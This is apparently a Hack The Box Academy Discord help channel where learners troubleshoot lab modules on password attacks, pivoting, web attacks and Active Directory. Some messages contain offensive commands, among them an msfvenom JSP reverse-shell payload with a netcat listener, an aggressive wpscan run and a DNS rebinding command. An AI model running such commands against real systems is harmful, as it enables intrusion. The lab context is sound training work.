#modules

1 messages · Page 448 of 1

minor hinge
#

Guys can anyone check if the IDOR Machines from Web Attacks module have some problems connectionwise. It takes too long to open each page

I cannot perform my task at the moment

fathom pendant
#

@rustic sage dont share discovered passwords

rustic sage
#

Sorry mate
his user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?

fathom pendant
#

It helps if you include the module and section name

rustic sage
#

Password Attacks
Credential Hunting in Network Shares

#

I treid all of password i found none of them worked

fathom pendant
#

The correct password is in that .txt file, I...###

rustic sage
#

thanks bro !

fathom pendant
mellow rapids
#

executed everything correctly but still have not been able to retrieve the flag.txt. I examine the commands as well since sudo is not a part of it but the file is own by root

fathom pendant
mellow rapids
#

Password Attack- Webservices

fathom pendant
#

Also make sure that you are in a directory you can write to (most common mistake)

#

Web services? Do you mean "network services"?

#

Can you link it?

mellow rapids
#

Sorry my apologies -- Login Brute Force - Web services

fathom pendant
#

Ahhhh ok

#

Very different module

mellow rapids
#

Yes! lol my apologies, I have been using medusa thats why the password attack got stuck in my head

fathom pendant
#

Yeah, then my suggestion is to make sure to move to a directory you can write to

#

/tmp is always a good option

mellow rapids
#

I was thinking of mentioning that earlier but I could not use it either under /tmp

fathom pendant
#

but ftpuser should be able to get the flag

mellow rapids
#

when you mean re-writing do you mean using chmod o+r?

fathom pendant
#

I never mentioned rewriting

mellow rapids
#

exactly my struggle, going to try and reset the pwnbox to see if that works but tried for a couple of days

mellow rapids
fathom pendant
#

It has nothing to do with chmod

#

Also o+r would be read permissions

#

The broad assumption im making is that you logged into the ftp service using ftpuser, and not sshuser

cosmic sentinel
#

sure :)
sudo wpscan -e p --url https://cube-case.htb --disable-tls-checks --no-banner --plugins-detection aggressive -t 100

mellow rapids
fathom pendant
devout lily
#

Hi, i tried this but it doesn't work, can u still help me?

#

can i send here a screenshot?

fathom pendant
sacred rock
mellow rapids
fathom pendant
#

No need for -sS and -sU

#

Its also possible you tripped the detection

devout lily
fathom pendant
#

Theres a reason my first s was lowercase

devout lily
#

is not the same than -sUV?

fathom pendant
devout lily
#

oh, whats the difference?

fathom pendant
#

What you did was -sSUV

mellow rapids
devout lily
fathom pendant
devout lily
fathom pendant
#

-s[can]U[DP]V[ersion]

fathom pendant
#

You added -sS into the mix

devout lily
#

the default scan

fathom pendant
#

And because there is a detection mechanism in place, it could incidentally trip it

devout lily
fathom pendant
fathom pendant
#

If the detection trips, it blocks you for 3 minutes

devout lily
fathom pendant
mellow rapids
cosmic sentinel
# sacred rock Needs passive detection instead of aggressive

Configuring the hosts file must have fixed the entire issue, my bad for using the wrong command :(( i tried many different options with the IP address before to see if it will output the vulnerable plugin and just reused the latest one in my bash history xD

Thanks for the help, much appreciated <3

fathom pendant
#

Btw @devout lily for all the skill labs, theres a status.php page you can visit at http://ip/status.php

#

So you can check if you were blocked

devout lily
mellow rapids
little shadow
#

I think I understand now. Thank you!
I have two more questions. Wouldn't it be better to exclude the bad characters from the beginning, like 0x0D, 0x0A, 0x00, or should we still enumerate in case we find new bad characters?
And what are some clear signs that a bad character has messed up a byte array, like you described?

devout lily
#

I added the -v option

fathom pendant
#

That's just nmap showing you the hex bytes of the response given

#

Also deleted bc the flag is in the image

devout lily
fathom pendant
devout lily
#

i think that i wont use the -v option no more haha

fathom pendant
devout lily
#

thank you

fathom pendant
#

Iirc nmap has three debugging levels

#

-v -vv -vvv

molten swallow
#

Hello guys! I was reviewing and re-doing modules after solid brake and came to the issue with Module: Footprinting / SMB. Nmap scans from my own machine gives the wrong version of the samba, without exact subversion. Root cause of that - some changes that've been made inside kali nmap. Netcat also don't provide the right banner with nc -nv ip port.

What do you think , can it make problems inside CPTS for example, should i reinstall older nmap ? Subversions often are crucial, and i cant find this exact correct banner from my own kali on this module in any way. Even from the wireshark capture. Although it gives right answer with academy pwnbox nmap scan.

fathom pendant
#

Well since this isnt related to an academy module i suggest linking your htb account and looking for other channels to ask in.

dusty ledge
#

NexusSeven is an active challenge and yo should not post spoilers about the challenge like that...
Delete that message and go to #challenges and ask for a hint there without posting spoilers of active content.

snow badge
#

Hey guys, I'm working on Pass The Certificate (module 147, section 1335) and am stuck trying to get flag.txt on Administrator's desktop. I was able to obtain jpinkman's ccache file and evil-winrm into DC01, but having trouble moving laterally to the Administrator. Do I need to use the AD CS NTLM Relay Attack for this? If so, I'm struggling to get gettgtpkinit.py to work on the certificate obtained from the previous steps.

gray yacht
#

I'd search this channel for clock skew as this gets asked quite often and there are already plenty of suggestions to fixing that error.

snow badge
gray yacht
sharp field
#

Did anyone manage to solve question 1 of this section??? No matter what I try I can't get the correct answer. I am starting to wonder there might be a mistake in the modoule. Also, I can't look at the step by step because I'm not a subscriber.

https://academy.hackthebox.com/module/312/section/3724

#

I already looked through the posts on #1234357888114364508 but couldn't find anything related to that

prisma pumice
#

Hello! I working on module "SQLMap Essentials", section "Attack Tuning", first question (What's the contents of table flag5? (Case #5)). I got flag in standard format HTB{<string>} but when I submits answer there is an error: Incorrect answer! Can you help me? What am I missing?

gray yacht
devout ginkgo
#

Hey guys, I need to contact htb support team about payments. Where can I do that?

gray yacht
devout ginkgo
#

Thank u I have send them an email

regal heath
#

hello just a question about the login brute force module in the custom wordlist
what the hell iam supposed to generate with
like there is no name no hints no nothing

gray yacht
gray yacht
fathom pendant
regal heath
#

oh i jumped to the question cus i know how to do it anyway

#

thats a bit stupid ngl

#

ty all

fathom pendant
#

In many cases the reading can reveal new or different ways of doing things as well. So I wouldn't always jump straight to the questions

#

In short though: when in doubt, check the reading first

regal heath
#

100%

#

but like i use my own linux destro which dont have apt on it so sometimes they ask to install softwares i have alternative too but mine wont work as thiers cus you know password custom lists tools are different

#

apt package manager

#

iam going to use the pwn box for that now

sharp field
river grove
little terrace
#

why is crackmapexec smb used for kerberos bruteforcing? arent those 2 totally different protocols and things

cloud urchin
#

smb is a protocol, kerberos is an authentication method not a protocol

#

well, it's an authentication method protocol i guess. but they are different things.

#

kerberos uses tickets to grant access to specific resources, smb is a service that can use a kerberos ticket, or a username and password

little terrace
#

do you know if this covered in the intro to ad module?

#

it seems that i am very lost on this, i might have to take the intro to ad mod

little terrace
#

i was just confused why nxc and cme was using smb in their parameters when trying to do kerberos usename\password cracking

wind gust
#

no because its HTB giving me the creds 😄

gray yacht
wind gust
prisma pumice
tight kraken
# little shadow I think I understand now. Thank you! I have two more questions. Wouldn't it be b...

Yes exactly-- when approaching a buffer overflow problem, it can save time to exclude some of those characters from the beginning. "Bad" characters aren't universally bad in all scenarios, but those three very often are. There's always the possibility we'll need to enumerate additional characters that happen to be "bad" given the particular app, architecture and delivery method we're working with in a given scenario.

The byte array comparison is a sure-fire way to tell if and why a buffer overflow will fail due to bad characters. If we were to skip this check and accidentally send a bad character, then only part of the payload will be written to memory. This leads to unpredictable program behavior. At best our payload will quietly fail... or we may recieve a more "clear sign" when the application crashes.

It's a good idea to thoroughly enumerate bad characters before firing away at the target. If we crash the real target application, there's no guarantee the OS will restart it. In a lab, this just costs time restarting the box. In a real engagement, we might only have one shot to get it right.

river grove
#

I have a question whether I'm on the right track solving Parameter Logic Bugs - PoC and Patching - Unexpected Input . Appreciate some help

little shadow
drowsy grove
#

doing the pass-the-certificate section of the password attacks module rn

#

does anyone know how to fix this?

cloud urchin
little terrace
# gray yacht Where is it doing this?

Password Attack module
suggests using kerbrute or netexec smb to find possible usernames and passwords from the ad
which is basically kerberos bruteforcing

stone lion
#

Cant get a revershell back to my machine .. i have entered correct ip and using the port to connect back from nc listener. Error shows failed to daemonise connecion timed out (110).

Also the script is getting executed but the connection is not coming back to the listener please help im struck since forever.

Ps this is from htb academy for file upload attacks module

gray yacht
gray yacht
keen nova
#

Hi guys!

#

I'm having a problem with a module. Can someone help??

cloud urchin
#

yeah just ask here. make sure not to spoil content from modules above tier 0 though.

#

answer format is: word-word

thick oak
cloud urchin
keen nova
#

So, this is for Mudule 19 Section 101

#

Host Discovery

#

I'm supposed to use the workstation, right?

#

I'm trying to figure out what command to give to the powershell...

gray yacht
keen nova
#

(using nmap)

#

@gray yacht Thank you for the help!

drowsy grove
#

Uhh...I got the hash from the DC pfx file...it's empty.......

#

I don't know why, but it is...

#

nvm, I just logged in with the NTLM hash

cloud urchin
#

Keep going

long kestrel
#

I feel like im doing the password attacks module all over again

visual barn
#

on the struggle bus with Indirect Prompt Injection 5. Hoping a break to make dinner resolves the issue and new ideas come to mind 🙂

fathom pendant
#

You still have the port in the second screenshot

long kestrel
#

The flag I got is wrong too, probably for a different section

fathom pendant
#

Also you can connect using the ftp command

#

ftp ip port

#

Don't need to use nc

long kestrel
#

I sprayed all 26k combinations from the provided credentials, only got that 1 user that didnt work. I used a different protocol to get in and found the user it wanted that way. I just have to find the other flag now

long kestrel
#

yeah looks like everything I found was for the next session lol

lime cosmos
#

How can I hide the images??

#

Ok so

#

The DC01 computer account has the DCSync right. I was able to get the TGT of the DC01 computer account, but when I try to dump the NTDS.dit, it doesn’t work. However, when I tried with the Administrator TGT, it worked

cloud urchin
#

@lime cosmos Please refrain from posting content from modules above tier 0

sharp nexus
#

Thanks @cloud urchin sorry about the confusion

frozen hound
#

Any suggestion about the module cracking the PIN ? I'm using the PIN solver script, the burp Intruder and also with ffuf, but I'm always receiving http code 401

exotic coral
#

Hey can I have some help with the payloads and shells module please?? I download the msfvenom file on my RDP client, I upload it to the website and deploy it. I have my netcat listening running on the correct port on my pawnbox and I go to the subdomain im supposed to go to for the shell and nothing happens. (msfvenom command: msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9001 -f war -o managerUpdated.war) (netcat listener: nc -nvlp 9001)

cloud urchin
exotic coral
cloud urchin
#

in the pwnbox type ip a

#

use the 10., i think ens192

#

unless you're trying to make the victim machine connect to the target you spawned, then it'll be different unless you're pivoting

exotic coral
#

I think im using the right ip for the pawnbox? tun0? 10.10..??

cloud urchin
#

then try that as your lhost

exotic coral
#

yeah I just did then I reuploaded the file to the website and went back to the subdomain and still nothing

cloud urchin
#

welp best to state the exact section and question you're on

#

other than that, maybe the wrong target type (jsp) idk

#

make sure to use the correct host/port for yourt attacker machine or the pivot, whichever one

exotic coral
#

Shells & Payloads, The live engagement, question 2

#

to make sure im understanding correctly Id use the msfvenom command on the RDP client and then upload the file I made from that to the website? and in the walkthrough it said to use (ip a | grep "172.16.1.*") and it spit out the ip (inet 172.16.1.5/23 brd 172.16.1.255 scope global ens224) which is what I used for the LHOST and then port 9001 which is the same as the netcat listener

cloud urchin
#

i'm not sure, i don't recall the skill assessment specifically. if you can execute the binary you generated with msfvenom successfully, then it can only be either 1) a network connection/routing issue or 2) incorrect settings with your msfvenom command.

exotic coral
#

oh okay, well thanks for helping!!

plain summit
#

Attacking Common Applications Attacking Drupal
My php rev shell won't work in my nc listener after pressing save in the web page that takes it.

thorn quarry
#

Excuse me.
Sliver subscription
Description

What you get

  • Direct access to all modules up to (including) Tier II
  • Direct access to the entire Bug Bounty Hunter job role path
  • Direct access to the entire Penetration Tester job role path
  • Direct access to the entire SOC Analyst job role path
  • Direct access to the entire AI Red Teamer job role path
  • Direct access to the entire Junior Cybersecurity Analyst
    —-
    So if I subscribe can i finish two or three path , whit-out the cube system
exotic coral
thorn quarry
#

I have free time and no life and i want to compete two or three ,can i

#

Or just stick to one path by subscription

exotic coral
#

I think the silver subscription is just one pathway?

thorn quarry
#

Yes thats my question , one path to complete or more than one path

rustic sage
#

sysreptor is stupid how do i reset my password?

#

I Literally saved thew password bro letter for letter and now it's invalid??

mental canopy
#

I thought you'd have access to all the paths you posted. You will only get an exam voucher for HTB CJCA and either HTB CBBH or HTB CPTS or HTB CDSA though

exotic coral
#

Is the academy more worth it or regular HTB more worth it?

cloud urchin
#

Probably depends on where you're at with knowledge

#

i like to think academy is the learning platform while the labs are where you practice what you know.

exotic coral
#

But is the labs worth paying for?

stable cape
#

.

cloud urchin
#

@long kestrel Please don't reveal answers

long kestrel
#

cool thanks

long kestrel
#

worked when I repeated steps on pwnbox instead of my VM. thats always a fun one

fathom pendant
#

if it's the lab i think it is, i just think the lab doesn't spin up properly all the time. which is a pain

fiery trench
#

Anyone available to help on Advanced SQL Injections Skills Assessment Q1?

I'm able to query the columns in the current table. Pretty much all the columns that appear in the source code, however, the password column is not giving me anything and I'm not sure on why. Any nudge would be greatly appreciated.

Edit: Found the issue, seems there is a filter. Gotta read and dissect the source code carefully!
Thanks @river grove

long kestrel
upper silo
#

Module: Shells and payloads.
Task: The live engagement

Is the initial foothold experiencing network issues "by-design" ?. I'm having troubles to maintain an proper session...
All ideas are welcome 🙂

fathom pendant
upper silo
fathom pendant
upper silo
rustic sage
#

his user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?
assword Attacks
Credential Hunting in Network Shares
I treid all of password i found none of them worked

rustic trail
#

hi, after setting the vHosts for session security modules, i am not able to access the websites. Ping is working for the ip and after setting the /etc/host i am also able to ping the domain names. But curl or request from browser is failing. Tried restarting the lab multiple times and tried changing my VPN locations. no luck

#

i don't know if its okay to attach screen shots for reference here

twilit wharf
#

Do HTB academy boxes boot always from a prepared image, or do they keep something from previous boots / players? I ask because I have seen different hosts in the "network" tab of explorer in different lab runs ...
Although this may also mean that I just see boxes of other players that are just discoverable?

sly kelp
#

Academy for focused learning and then HTB labs to make those concepts stronger.

severe eagle
#

Hey guys anyone had issues with exploiting the attacking common applications attacking drupal think the vms are bugged i have done this again and again followed instructions to exploit it the machine ends up freezing 10min in and thats it no exploit cant do anything

#

Moment start trying to change settings and add content page starts freezing

#

Been 48hours now of dealing with it im from aus so the vpns bit slow as well but frustrating anyone else had issues?

severe eagle
#

Yeah vm no good anyone doing dont bother using metasploit just upload php code navigate using curl

knotty cloud
#

I have been stuck on this question in Parameter Fuzzing GET. Using what you learned in this section, run a parameter fuzzing scan on this page. What is the parameter accepted by this webpage? does anyone know how to solve this

severe eagle
#

Is this on pentest path?

#

Dm me if you want mate can help

knotty cloud
#

@severe eagle okay thank you

brazen saffron
#

Hello, I'm trying to complete the module "Linux Fundamentals" and I'm trying to conclude this question: What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k? (section: Find Files and Directories)

I run the following command:
||find / -type f -name "*.conf" -newermt 2020-03-03 -size +25k -size -28k 2>/dev/null||
But it's tellming that it's wrong... I read some writeup to check if I was good and yes, why it's tellming it's an incorrect answer?

brazen saffron
#

Mb I'm just stupid :>.

forest tendon
#

I need help in choosing a new module, I have already completed 1. Windows Fundamentals 2. Introduction to networking 3. Introduction to active directory.... Where should I go from here? Priv esc OR Windows Attack & Defense?

worldly heron
steady pelican
#

Hello,
I am on Windows Privilege Escalation Module, I am working on Windows Privilege Escalation Skill Assessment Part - 1. I am stuck on question 2 and 3.
I am on Windows Server 2016, I need to find ldapadmin password and tried everything taught in the module, still did not find anything. The SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege is enabled, however, Juicy potato and printspoofer exploit fails.
Any nudge

devout lily
#

Why the -sV option is not showing to me the version of that service?

#

Firewall and IDS/IPS Evasion - Hard Lab

cosmic sentinel
#

Hi everyone,
In the Pentest in a Nutshell module -> Linux Privilege Escalation section https://academy.hackthebox.com/module/296/section/3398
it says that the user john is able to run /usr/bin/nano without typing a password, but it still requires a password when i try out the procedure myself...

cosmic sentinel
# cosmic sentinel Hi everyone, In the Pentest in a Nutshell module -> Linux Privilege Escalation s...
balmy goblet
#

Hey, I’m doing the password attacks module, I’m on the intro to jtr. Is it possible to use the vpn in this part of the module, cause I don’t wanna use the pwnbox but there is no ssh to access the passwd to crack r0lfs password

cloud urchin
#

You never are forced to use the pwnbox. You can always use your own VM. Sometimes there are sections of modules that require you to run commands from the target spawned though (not the pwnbox.)

balmy goblet
#

But how would I get the specific passwd file into a vm

#

And there is no target spawned in this

cloud urchin
#

copy/paste the hash?

balmy goblet
#

Ohhh, ok, thanks

mental canopy
#

I've never liked the order of questions in that module. Do question 3 then question 2

steady pelican
green shuttle
#

Hi i am in the end of AEN did most of it blind but got to a point where the exploit dont work in lateral movement section (ftpservice) if anyone could help i would appreciate

storm elk
green shuttle
#

I tried the solution in the path but didnt work

#

Even restarted the machine and tried another online solution to the exploit

storm elk
#

I can’t remember having issues with it 🤔

#

Can’t check now though, on my phone

green shuttle
#

ok i will see what i can do

steady pelican
twilit wharf
#

Lateral Movement Module -> Skill assessment -> Second question says there is a flag on a desktop, but there is not. Can someone pls check? Seems like a bug to me

golden steppe
#

Hi, anyone could help me with Windows Attacks & Defense > PKI - ESC1? I did convert to cert.pfx but when running Rubeus it shows this error "KDC_ERR_PADATA_TYPE_NOSUPP".

opal shuttle
twilit wharf
opal shuttle
cloud urchin
snow mirage
#

^

#

If I had to take a guess, you're working on the Web one right now

mental canopy
twilit wharf
snow mirage
#

Also, make sure you set your realms properly in the krb5.conf

steady pelican
timid tusk
#

Hi

snow mirage
#

I tried this in both the pwnbox and my Kali VM machine

#

I mean if I'm understanding this correctly, this should start a local listener on local port 3300 request Meterpreter to forward all the packets received on this port via our Meterpreter session to the remote host 172.16.5.19 and remote port 3389

cloud urchin
#

@snow mirage Please take care not to post contents from modules above tier 0

snow mirage
#

So where can I go for help on this module that's apart of the CPTS path @cloud urchin ?

cloud urchin
#

here, just don't post content from modules above tier 0

snow mirage
#

...

#

That was from the module. bro what? I'm not understanding you. So I can ask for help for the module here....but I can't post of the module here because it's above tier 0?

Or was it because of the screenshots? @cloud urchin

cloud urchin
#

Your screenshot contained contents from the module. It had a username and password. On top of this, anyone who has done the modules doesn't need details from the module because they know what to do already so there is no need to post content from the module.

#

Your error said failed to connect to the localhost, so it's likely a routing/config issue with your proxychains.

snow mirage
#

My proxychains has the line socks4 127.0.0.1 9050 since I'm using a version 4a socks proxy

My meterpreter socks proxy server was set with ip of 0.0.0.0 and port of 9050

#

so my socks proxy server matches my proxychains

#

but it's still not working

mental canopy
#

You can state the module and the issue without the screenshot. If it's in the CPTS path I can boot up the lab and take a look

cloud urchin
#

you may also need to wrap the password in single quotes due to special chars

#

but the error is clear, says can't connect to localhost

#

maybe go over the section again, looking at my notes i'm not seeing connecting to localhost

#

should be connecting to the target

snow mirage
#

Module: **Pivoting, Tunneling, and Port Forwarding
**
Section: Meterpreter Tunneling & Port Forwarding

Yeah I was just trying to follow the instructions in the module.

There's a line about creating a Local TCP relay and then connecting to the target through that localhost

#

over xfreerdp

leaden island
#

yo guys

cloud urchin
#

i see, that's further down than i was looking

leaden island
#

the output crack_file is empty

snow mirage
#

Didn't mean to spoil content my b

cloud urchin
#

but this part doesn't look like you use proxychains

#

so you are doing things the section didn't show, try following exactly what it shows

leaden island
#

ive extracted base64 string from mimikatz, removed new lines, and saved it to file.kirbi, then i run python3 kirbi2john.py file.kirbi, and i get a crack_file, but its empty

#

im on AD assesment 1 btw

snow mirage
#

I mean using proxychains and setting it up was apart of the earlier portion of the module. That being said when I say I "set it up" It already had that line socks4 127.0.0.1 9050

There was a line right after that to use the socks_proxy module to route all the traffic via our Meterpreter session which seems to copy the proxychains conf I think?

So once that's done, I route all the traffic via my Meterpreter session with autoroute

#

and then followed the instructions to portforward in the next topic section of that page

#

So it sounds like you are in-fact supposed to do it. I think the meterpreter session is doing the equivalent of local SSH port forwarding. It's just not working lol

bright belfry
#

I'm on Question#5 in the Network Foundations/Internet Architecture quiz, and its asking me In which architecture is the control plane separated from the data plane? (Format: two words, one of which is hyphenated) I've answered "Software-Defined", or software-defined, and it's not accepting any of my answers. Is this the incorrect answer? https://academy.hackthebox.com/module/289/section/3242

snow mirage
#

@mental canopy is it possible I can DM you. if not, totally ok.

mental canopy
leaden island
bright belfry
#

I'm on Question#5 in the Network Foundations/Internet Architecture quiz, and its asking me In which architecture is the control plane separated from the data plane? (Format: two words, one of which is hyphenated) I've answered "Software-Defined", or software-defined, and it's not accepting any of my answers. Is this the incorrect answer? https://academy.hackthebox.com/module/289/section/3242

knotty nebula
#

Maybe this is not the right channel (GOt redirected here, so just copy pasting my question over here)
Why is the vpn configuration file working perfectly fine but not if i run it as a basic command (exiting due to fatal error)
1 line before: 2025-08-30 20:51:40 ERROR: Cannot ioctl TUNSETIFF tun: Operation not permitted (errno=1)
(t is a Linux-specific ioctl (input/output control) command used by user-space applications to request the creation of a network device that operates at the IP (Layer 3) level, known as a TUN interface. )
Still not quite getting it- so this is like a network device in the network layer (3) that is being "newly" created in order to add a vpn configuration ? (Thats my assumption kinda)

bold niche
earnest jacinth
#

in DACL Attacks II, the Shadow Credentials section states that if Certificate Trust model is implemented, the client issues a certificate request to obtain a trusted certificate from the environment’s certificate issuing authority for the TPM-generated key pair. On the other hand, if the Key Trust model is implemented, the public key is stored in a new Key Credential object in the msDS-KeyCredentialLink attribute of the account.

But in the exploitation attempt, whisker or pywhisker generate a certificate that is later used to obtain a TGT, even tho whisker obviously shows that it is editing the msDS-KeyCredentialLink attribute which means the Key Trust model is used instead of the Certificate Trust model.

Can anyone clarify this point ?

golden steppe
sterile sonnet
#

I’m working on the lab “Windows Event Logs & Finding Evil: Analyzing Evil With Sysmon & Event Logs” using PWNBOX. sysmon.exe -c filename.xml wasn’t working, so I tried troubleshooting by uninstalling Sysmon and then reinstalling it using sysmon.exe -i -accepteula -h md5,sha256,imphash -l -n. Even after this, I still cannot get sysmon.exe -c filename.xml to work. I also changed the directory to C:\Tools\Sysmon, but it keeps giving an error that the directory or file doesn’t exist. I need this to properly attempt the hijack using calc.exe as part of the lab. Could you provide guidance on the correct way to use the configuration file or troubleshoot this issue?

dark glen
#

Hi.. am having trouble identifying a network interface for which I can use to capture a handshake.i have tried ip a and iwconfig but there is no wlan interface only 2 interface which is tunn, internet and loopback. Running an instance on htb. How do i solve this?

late junco
#

hey guys, i need help with these two questions in Footprinting Module DNS Section

ruby axle
#

Yo

cloud urchin
#

@prisma knot Please don't post content from modules above tier 0, ie passwords etc. Try wrapping the password in single quotes.

prisma knot
cloud urchin
prisma knot
hidden urchin
#

In "Pivoting, Tunneling, and Port Forwarding" module section "RDP and SOCKS Tunneling with SocksOverRDP" when i am extracting the "SocksOverRDP x64 Binaries" on the Windows machine from where i am suppose to pivot the window is deleting the DLL file before ni can even execute the command how to fix this

cloud urchin
#

Disable real time monitoring

light flume
#

I am the alpha skid

cloud urchin
hidden urchin
tranquil arrow
#

@cloud urchin

cloud urchin
hidden urchin
#

Okay

plain summit
#

Has anyone completed.
Attacking Common Applications Attacking Drupal
If so, please DM me.

alpine mural
#

This line save my day! Thanks!

raw dust
#

@here

pallid pilot
#

Hello, can somebody help me, i am in the modern web exploitation techniques PDF page, so i use DNSRebinder for making my petition, i am using like this ||sudo python3 dnsrebinder.py --domain www.attacker.htb --rebind MyServer --ip 1.1.1.1 --counter 1 --tcp --udp|| cause when i use it like it is suggest in the module i get the internal server error, so the only thing i was able to do is to load an HTML PoC but i thing that scripts arent running. Plz give me some hints

raw dust
#

i have masked the flag actually

#

why is HTB flag ans not getting accepted ? i s there any issue with the lab ?

#

as mentioned in the hint i have run --no-cast and -T flag5 parameters

pallid pilot
cloud urchin
#

for one your server isn't going to be 1.1.1.1

pallid pilot
#

No, the 1.1.1.1 is the only way i found to bypass the internal server error

cloud urchin
# raw dust

Casting probably modifying the flag. Guess what it could be based on what the flag says, or re-do it

inner sand
#

How can I apply to contribute to making content/modules on HTB ?

cloud urchin
pallid pilot
cloud urchin
#

I could be misremembering but I thought you had to use your own DNS server for that

pallid pilot
#

Instead of DNS rebinder?

cloud urchin
#

looking at my notes, your command isn't the same as mine so idk

pallid pilot
#

but you are using like its mention in the module ||sudo python3 dnsrebinder.py --domain www.attacker.htb. --rebind 192.168.178.1 --ip $PUBLIC_WEBSERVER_IP --counter 1 --tcp --udp||?

cloud urchin
#

idk, there are like 5 DNS rebinding sections, i just picked one since you didn't say which

#

i'd suggest just going over the section again carefully and making sure it's setup properly

pallid pilot
#

Im using the SOP bypass one

#

cause when i go to the flag page it says "Access Violation: Not localhost"

cloud urchin
#

sounds like it's got some protection you need to get around then

#

i can't quite remember

#

i remember it worked though

#

so like i said go through it again double check make sure everything is correct

pallid pilot
#

Ok thanks for ur help mate

cloud urchin
#

yeah sorry been a long time since i did that module

pallid pilot
#

I got it bro thanks for ur suggestions @cloud urchin

cloud urchin
#

@stable flume Please take care not to post content from modules above tier 0

cosmic sentinel
cloud urchin
#

It gives you a cmdlet to run if it fails, did you try that?

cosmic sentinel
cloud urchin
#

no, the cmdlet your app says

cosmic sentinel
cloud urchin
#

no... the cmdlet shown in your screenshot..

cosmic sentinel
cloud urchin
#

probably yeah

#

looks like that user doesn't have perms for the binary though

#

i didn't do that module so not sure

quasi wave
#

Should hack the box have an exploit development certification? I mean offsec has several

#

And wouldn’t it help people who want to learn to code for infosec?

waxen totem
quasi wave
#

Ok

#

Just told them

cosmic sentinel
quasi wave
#

I think they are adding more python content tho

#

Since the AI red teamer path assumes python fundamentals skills

#

So I think they probably do have SOMETHING in mind

#

Where they integrate coding skills

#

It says it recommends calculus as prereq for AI path

#

Do you really need calculus?

#

But it does say python fundamentals is required

#

I think maybe I should stop talking about all this stuff because it does look like material that requires programming is slowly being added

acoustic owl
quasi wave
#

Ok I just wrote a bunch of feedback.

#

I wrote some recommended paths in feedback:

  • malware development/exploit development path in c/c++
  • python web pentesting path
  • wireless pentesting in python path
  • writing phishing pages that evade phishing filters path with JS, PHP, SQL, etc
#

Anyone thought of a path I haven’t?

#

Not necessary to have all these paths of course but it would be cool

#

In the event that they don’t add all of these paths, I will try to learn some of this stuff anyways at some point

#

But I’m not gonna do that until I have completed other learning paths preferably at least one from tier 3

#

But ya I don’t know I don’t think any of those paths need to be a path but I can see someone benefiting from it

#

Most of them would be skills paths

#

Probably

#

But what do you guys think?

#

I also think it would be cool to have a path that does stuff with BASH or PowerShell as a specialty like for privesc

#

Any of these things resonate with you guys?

#

Any of these would be cool imo

#

Not necessary because you can just learn frameworks and build stuff

storm elk
#

Maybe post all your stuff here too @quasi wave

#

This might just get lost , unless you provide /feedback

quasi wave
#

But would definitely be fun. Since I don’t want to depend on a learning path becoming a thing, I looked at python frameworks that could complement CWEE material, it gave ok results.

quasi wave
acoustic owl
#

If I remember correctly, malware development was once addressed in a cube cast.

The Python Web Pentesting exists and is called CWEE

There are several wireless pentesting modules. Do you want to write existing frameworks in Python? Or what is the goal here?

Bypassing phishing filters doesn't have much in common with ethical hacking.

storm elk
#

Okay 🙂

quasi wave
#

For each of the things I mentioned I made feedback

quasi wave
#

Great. So I am psyched that’s w thing.

#

Bypassing phishing filters would be an educational thing. Could be good for red teaming or learning how to defend against it better.

waxen totem
quasi wave
#

Also, which cube cast?

quasi wave
#

Can I listen to an old cube cast?

#

I would like to listen

acoustic owl
quasi wave
quasi wave
#

For wireless, I’m thinking there could be a path to write like IoT attacks in Python or write python scripts to complement wifi or other wireless hacking tools

#

Like to complement existing tools

acoustic owl
quasi wave
#

Ok got it

#

Never mind that then

#

What about python for enterprise network attacks to complement pro labs?

#

Maybe I’m overthinking it

waxen totem
#

You wouldn't really use python for attacking enterprise networks, you're more likely to need a compiled Windows compatible language like C

quasi wave
#

Ok

waxen totem
#

Check out Attacking Enterprise Network module

quasi wave
#

Ya well in that case maybe I’m overthinking it

#

Ya that’s a module at the end of CPTS

#

Well ok

#

Well maybe I am being dumb but I looked at announcements page and I can’t find the exact cube talk even when searching for exploit development.

#

Was this a recent cube talk?

#

Or was it a long time ago?

acoustic owl
#

But you can find all Cube Talks here. I don't know in which one this was mentioned. It could have been a while ago.

tight kraken
# quasi wave I wrote some recommended paths in feedback: - malware development/exploit devel...

Regarding malware/exploit development in C/C++... you might be interested in some of the Tier IV Defensive modules. While the exercises and assessments are defense-oriented, the section content is fairly purple. These modules assume a basic understanding of C/C++, pointers and structures, and there are some tricky programming challenges.

Intro to Windows Evasion features some exploit development in C# as well. More of these would be great.

leaden island
#

yo guys im on AD assesment 1

#

idk this might be a spoiler

#

anybody i can DM for help ?

winged elm
#

how did you identify where the problem was?

floral fulcrum
#

could i get a nudget for NoSQL injection sa2?, pretty sure i know what to do just need a slight nudge on whether what im doing makes sense

cloud urchin
#

@wanton heath No. This server is for discussion of HTB, not illegal stuff.

wanton heath
acoustic forge
#

I am having the exact same issue - hashcat does not work on the provided vm- i have the hashes but they do not crack with rockyou

cloud urchin
#

If hashcat iterated through rockyou successfully it sounds like hashcat is working

royal aspen
#

Introduction to Networking and Network Foundations modules. Which one should i start first?

terse bloom
#

Hello, would appreciate some help. Crafted a golden ticket, converted to .ccache and exported, but I get this error: [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) when trying to connect with my newly created user GOD

clear steppe
#

I found this picture in "Network fundamentals":

IP address started with "503.x.x.x"?? Really? Who is the author of this study, I wonder?

dark glen
plain summit
#

Attacking Common Applications Splunk - Discovery & Enumeration
I cannot access any of the splunkd ports attached to the target port using either curl or the browser. How do you resolve this issue?

static plinth
#

@hasty mauve @brave field
Really late reply but I might have an answer (maybe you already knew but just in case).

I ran into the same sharp/bloodhound issues. Running the pre-installed sharphound.exe and bloodhound legacy on the remote workstation was the only method that led to 13 kerberoastable accounts.

Then I noticed that the krbtgt account was visible in the 13 accounts and not in the 12 accounts. Bloodhound legacy uses a different query which leads to 13 instead of 12:

MATCH (n:User)WHERE n.hasspn=true
RETURN n

vs bloodhound ce query

MATCH (u:User)
WHERE u.hasspn=true
AND u.enabled = true
AND NOT u.objectid ENDS WITH '-502'
AND NOT COALESCE(u.gmsa, false) = true
AND NOT COALESCE(u.msa, false) = true
RETURN u
LIMIT 100

This explains the different outcomes! One thing I still don't understand is why using the latest sharphound version only leads to 1 or 2 kerberoastable users, that still bothers me 😂

hasty mauve
#

I will attempt to test the latest SharpHound version and see if it will give me the same result as yours.

static plinth
hasty mauve
#
  • I used the query
